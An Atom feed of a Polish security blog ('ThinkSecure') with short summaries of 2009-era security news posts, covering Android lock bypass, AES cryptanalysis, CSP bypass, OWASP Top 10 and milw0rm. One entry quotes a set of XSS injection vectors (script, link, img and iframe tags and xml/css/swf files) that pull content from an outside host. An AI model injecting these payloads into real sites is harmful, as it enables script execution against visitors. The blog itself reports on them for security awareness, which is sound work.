<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6422406678944733222</id><updated>2024-10-12T17:08:42.392-07:00</updated><category term="security"/><category term="(in)security"/><category term="xss"/><category term="9:23"/><category term="adresy"/><category term="bankowosc"/><category term="ciekawe"/><category term="confidence 2.0"/><category term="cryoto aes security"/><category term="csp"/><category term="dns"/><category term="droid"/><category term="exploit"/><category term="flash"/><category term="gareth"/><category term="hack"/><category term="infiltracja"/><category term="internetowa"/><category term="iphone"/><category term="java"/><category term="klient"/><category term="lifehack"/><category term="linki"/><category term="mbean"/><category term="mbeans"/><category term="middleware"/><category term="milw0rm"/><category term="milworm"/><category term="podatnosci"/><category term="policy"/><category term="rip"/><category term="ryzyko"/><category term="security portfel"/><category term="ssl"/><category term="str0ke"/><category term="stroke"/><category term="tokeny"/><category term="tygodnia"/><category term="urodziny"/><category term="vulnerability"/><category term="weblogic"/><category term="websphere"/><category term="xss security ie8 freebsd exploit wordpress garethheyes"/><category term="xss security ie8 sql inj nasa vulnerability"/><category term="xss xbl xhtml security"/><category term="zagrozenie"/><title type='text'>ThinkSecure - Michał Wiczyński</title><subtitle type='html'>&amp;quot;...These five heads should be familiar to every general: he who knows them will be victorious; he who knows them not will fail.&amp;quot;&#xa;&#xa;Sun Tzu&#xa;irytacje &amp;amp; przemyslenia by wheelq</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-15901880188238643</id><published>2014-02-12T11:06:00.003-08:00</published><updated>2014-02-12T11:06:33.253-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="java"/><category scheme="http://www.blogger.com/atom/ns#" term="mbean"/><category scheme="http://www.blogger.com/atom/ns#" term="mbeans"/><category scheme="http://www.blogger.com/atom/ns#" term="middleware"/><category scheme="http://www.blogger.com/atom/ns#" term="weblogic"/><category scheme="http://www.blogger.com/atom/ns#" term="websphere"/><title type='text'>What are MBeans JavaBeans and JMX</title><summary type="text">
What are MBeans JavaBeans and JMX


What are MBeans?
MBeans Objects are type of JavaBean, created (mostly) with the Dependency Injection

What is inside the MBean?


http://thinkmiddleware.blogspot.co.uk/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/15901880188238643/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2014/02/what-are-mbeans-javabeans-and-jmx.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/15901880188238643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/15901880188238643'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2014/02/what-are-mbeans-javabeans-and-jmx.html' title='What are MBeans JavaBeans and JMX'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-3164811451470423986</id><published>2010-01-29T01:39:00.000-08:00</published><updated>2010-01-29T01:39:00.875-08:00</updated><title type='text'>I jak tu (nie) ufac</title><summary type="text">By Rob Preece Crime Correspondent

&quot;A FORMER anti-fraud boss at the Yorkshire-based bank First Direct has been jailed for stealing from customers&#39; accounts to fund his alcoholism and cocaine addiction.
In his £65,000-a-year job as head of fraud operations, Richard Crawford, 41, was trusted with the personal details of account holders whose finances were thought to be most at risk from criminals.&quot;</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/3164811451470423986/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2010/01/i-jak-tu-nie-ufac.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3164811451470423986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3164811451470423986'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2010/01/i-jak-tu-nie-ufac.html' title='I jak tu (nie) ufac'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-7190443603860971588</id><published>2010-01-12T04:36:00.000-08:00</published><updated>2010-01-12T04:36:30.298-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="droid"/><category scheme="http://www.blogger.com/atom/ns#" term="iphone"/><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability"/><title type='text'>Niebezpieczny Droid</title><summary type="text">Zła wiadomość dla użytkowników Droid&#39;a. Android OS ver. 2.0.1, czyli aktualna wersja na której działa Droid, posiada lukę bezpieczeństwa która umożliwia obejście zabezpieczenia blokady ekranu.



Zabezpieczenie polega na połączeniu kropek na ekranie, w taki sposób jaki wcześniej został zdefiniowany przez użytkownika. (iPhone posiada podobną opcję).

Obejście zabezpieczenia jest niezwykle łatwe. </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/7190443603860971588/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2010/01/niebezpieczny-droid.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7190443603860971588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7190443603860971588'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2010/01/niebezpieczny-droid.html' title='Niebezpieczny Droid'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-7089558141604069967</id><published>2009-12-19T07:32:00.000-08:00</published><updated>2009-12-19T07:32:55.330-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="security portfel"/><title type='text'>Stalowa chrona kart zbliżeniowych</title><summary type="text">Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych.

W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel &#39;utkany ze stali&#39;. 



Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.

Portfel utkany jest z ponad 20.000 </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/7089558141604069967/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/stalowa-chrona-kart-zblizeniowych.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7089558141604069967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7089558141604069967'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/stalowa-chrona-kart-zblizeniowych.html' title='Stalowa chrona kart zbliżeniowych'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-4954459875045374713</id><published>2009-12-16T03:10:00.000-08:00</published><updated>2009-12-19T07:44:32.156-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="(in)security"/><category scheme="http://www.blogger.com/atom/ns#" term="urodziny"/><category scheme="http://www.blogger.com/atom/ns#" term="xss"/><title type='text'>#10 &#39;te #urodziny #xss ! sto lat sto lat :)</title><summary type="text">16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy:

Unauthorized Site Scripting
Unofficial Site Scripting
URL Parameter Script Insertion
Cross Site Scripting
Synthesized Scripting
Fraudulent Scripting
Następnego dnia uzgodniono nazwę - Cross Site Scripting.

Na początku lutego, wypuszczono dokument (CERT):

http://www.cert.org/advisories/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/4954459875045374713/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/10-te-urodziny-xss-sto-lat-sto-lat.html#comment-form' title='Komentarze (1)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4954459875045374713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4954459875045374713'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/10-te-urodziny-xss-sto-lat-sto-lat.html' title='#10 &#39;te #urodziny #xss ! sto lat sto lat :)'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-6443990854115912469</id><published>2009-12-09T04:14:00.001-08:00</published><updated>2009-12-09T04:14:01.538-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="cryoto aes security"/><title type='text'>(update) do (in)security tygodnia</title><summary type="text">Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz:


http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html   Nowy sposób na #łamanie #AES #security #crypto</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/6443990854115912469/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/update-do-insecurity-tygodnia.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/6443990854115912469'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/6443990854115912469'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/update-do-insecurity-tygodnia.html' title='(update) do (in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-6388680113928358406</id><published>2009-12-09T03:07:00.000-08:00</published><updated>2009-12-09T03:07:53.454-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="xss xbl xhtml security"/><title type='text'>All in one exploit...s !</title><summary type="text">Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;)

Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.

Oto one:

http://0x.lv/xss.xml XBL+XHTML

http://0x.lv/xss.css (binding/expression/jsuri) 

http://0x.lv/xss.swf (getURL)

&amp;lt;script src=//0x.lv&amp;gt; LUB &amp;lt;link rel=stylesheet href=//0x.lv&amp;gt; LUB &amp;lt;img src=//0x.lv&amp;gt; LUB &amp;lt;iframe src=/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/6388680113928358406/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/all-in-one-exploits.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/6388680113928358406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/6388680113928358406'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/all-in-one-exploits.html' title='All in one exploit...s !'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-531753578677067031</id><published>2009-12-08T17:17:00.000-08:00</published><updated>2009-12-08T17:17:06.703-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="xss security ie8 sql inj nasa vulnerability"/><title type='text'>(in)security tygodnia</title><summary type="text">Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:

http://www.net-security.org/secworld.php?id=8594
#Fake #fingerprint fools #biometric #devices #security


http://www.heise-online.pl/security/news/item/Ostatnia-deska-ratunku-UFO-hakera-877758.html
Ostatnia deska ratunku &quot;#UFO-#haker a&quot;#Gary ’ego #McKinnon a


http://www.networkworld.com/news/2009/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/531753578677067031/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/insecurity-tygodnia_08.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/531753578677067031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/531753578677067031'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/insecurity-tygodnia_08.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-2562301015951875699</id><published>2009-12-02T14:10:00.000-08:00</published><updated>2009-12-04T04:18:52.288-08:00</updated><title type='text'>OWASP TOP10 2010 RC1 PL</title><summary type="text">W związku z niedawno opulbikowanym #OWASP TOP10 RC1&amp;nbsp;http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project postanowiłem przetłumaczyć dokument, wzbogacając go o parę własnych zdań. Dokument pobieramy tutaj:&amp;nbsp;http://www.slideshare.net/thinksecure/owasp-top10-2010-rc1-pl


Aktualizacja:

Zapraszam rowniez na: http://pentester.jogger.pl/2009/12/02/owasp-top-10/


Owasp Top10 2010 RC1</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/2562301015951875699/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/owasp-top10-2010-rc1-pl.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/2562301015951875699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/2562301015951875699'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/owasp-top10-2010-rc1-pl.html' title='OWASP TOP10 2010 RC1 PL'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-4508615642343303743</id><published>2009-12-01T09:17:00.000-08:00</published><updated>2009-12-01T09:17:13.496-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="xss security ie8 freebsd exploit wordpress garethheyes"/><title type='text'>(in)security tygodnia</title><summary type="text">&lt;!--StartFragment--&gt;  
Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:


http://www.heise-online.pl/security/news/item/Exploit-dajacy-uprawnienia-roota-w-FreeBSD-Uzupelnienie-873354.html #Exploit dający uprawnienia roota w #FreeBSD #security #root

http://www.thespanner.co.uk/2009/11/23/ping-pong-obfuscation/ #Obfuskacja w obfuskacji obfuskacji... #xss #</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/4508615642343303743/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/insecurity-tygodnia.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4508615642343303743'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4508615642343303743'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/12/insecurity-tygodnia.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-8345504820867736666</id><published>2009-11-23T03:49:00.000-08:00</published><updated>2009-11-23T03:53:00.181-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="(in)security"/><category scheme="http://www.blogger.com/atom/ns#" term="csp"/><category scheme="http://www.blogger.com/atom/ns#" term="gareth"/><category scheme="http://www.blogger.com/atom/ns#" term="xss"/><title type='text'>CSP na kolana</title><summary type="text">Gareth Heyes&amp;nbsp;opublikował właśnie na swoim blogu, informację dotyczącą sposobu ominięcia zabezpieczeń w&amp;nbsp;#CSP http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/


Na czym polega błąd?

Każda strona z feedem JSON&#39;a nad którym może mieć kontrolę atakujący, może zostać zarażona własnym ciągiem JSON&#39;a, dzięki czemu można kontrolować pozostałe elementy feed&#39;a.
Wyjaśnijmy </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/8345504820867736666/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/csp-na-kolana.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/8345504820867736666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/8345504820867736666'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/csp-na-kolana.html' title='CSP na kolana'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-1696815493956292056</id><published>2009-11-18T05:15:00.000-08:00</published><updated>2009-11-18T05:17:08.983-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="lifehack"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Każdy lubi puknąć</title><summary type="text">Przeglądając lifehack&#39;i, trafiłem na dosyć ciekawe zastosowanie pukania jako klucza do drzwi.



Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu.

http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/1696815493956292056/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/rytmiczne-pukanie.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1696815493956292056'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1696815493956292056'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/rytmiczne-pukanie.html' title='Każdy lubi puknąć'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-2656014643153615553</id><published>2009-11-18T04:36:00.001-08:00</published><updated>2009-11-18T04:36:45.800-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="(in)security"/><category scheme="http://www.blogger.com/atom/ns#" term="infiltracja"/><title type='text'>Infiltracja w Polsce</title><summary type="text">No proszę, myślałem że już nic mnie w tym kraju nie zaskoczy, a tu takie numery...


http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/2656014643153615553/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/infiltracja-w-polsce.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/2656014643153615553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/2656014643153615553'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/infiltracja-w-polsce.html' title='Infiltracja w Polsce'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-4780278939364527066</id><published>2009-11-18T04:16:00.000-08:00</published><updated>2009-11-18T04:16:37.777-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="confidence 2.0"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>CONFidence 2.0</title><summary type="text">To już jutro,

Agenda:&amp;nbsp;http://200902.confidence.org.pl/agenda/

Zapowiada się naprawdę ciekawie :)

Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np:

Gareth Heyes XSS Lightsabre techniques using Hackvertor
oraz w tym samym czasie:
Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way…

tak samo:&amp;nbsp;Gynvael Coldwind Practical security in </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/4780278939364527066/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/confidence-20.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4780278939364527066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/4780278939364527066'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/confidence-20.html' title='CONFidence 2.0'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-3824204894599806762</id><published>2009-11-17T06:25:00.000-08:00</published><updated>2009-11-17T06:25:23.574-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="dns"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="flash"/><category scheme="http://www.blogger.com/atom/ns#" term="hack"/><category scheme="http://www.blogger.com/atom/ns#" term="policy"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="ssl"/><title type='text'>(in)security tygodnia</title><summary type="text">Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:



http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article
#Cenzic wants to make sure your #Web site is #healthy

http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/
#</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/3824204894599806762/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia_17.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3824204894599806762'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3824204894599806762'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia_17.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-3396292139497611435</id><published>2009-11-10T01:52:00.000-08:00</published><updated>2009-11-10T01:52:40.585-08:00</updated><title type='text'>(in)security tygodnia</title><summary type="text">
Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:
http://blog.securitystandard.pl/news/352111.html - Łamanie haseł w chmurze #pgp #lamanie #security #cloud

http://blogs.zdnet.com/security/?p=4805 - iHack wirus na iPhone #iphone #wirus #security #jail

http://livelabs.com/web-sandbox/ - Web sandbox od microsoft #microsoft #web #security #sandbox

http://chuvakin.blogspot.com/2009</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/3396292139497611435/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia_10.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3396292139497611435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3396292139497611435'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia_10.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-7090977670148452698</id><published>2009-11-04T01:18:00.000-08:00</published><updated>2009-11-04T01:19:05.676-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="9:23"/><category scheme="http://www.blogger.com/atom/ns#" term="milw0rm"/><category scheme="http://www.blogger.com/atom/ns#" term="milworm"/><category scheme="http://www.blogger.com/atom/ns#" term="rip"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="str0ke"/><category scheme="http://www.blogger.com/atom/ns#" term="stroke"/><title type='text'>str0ke nie żyje, milw0rm</title><summary type="text">bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

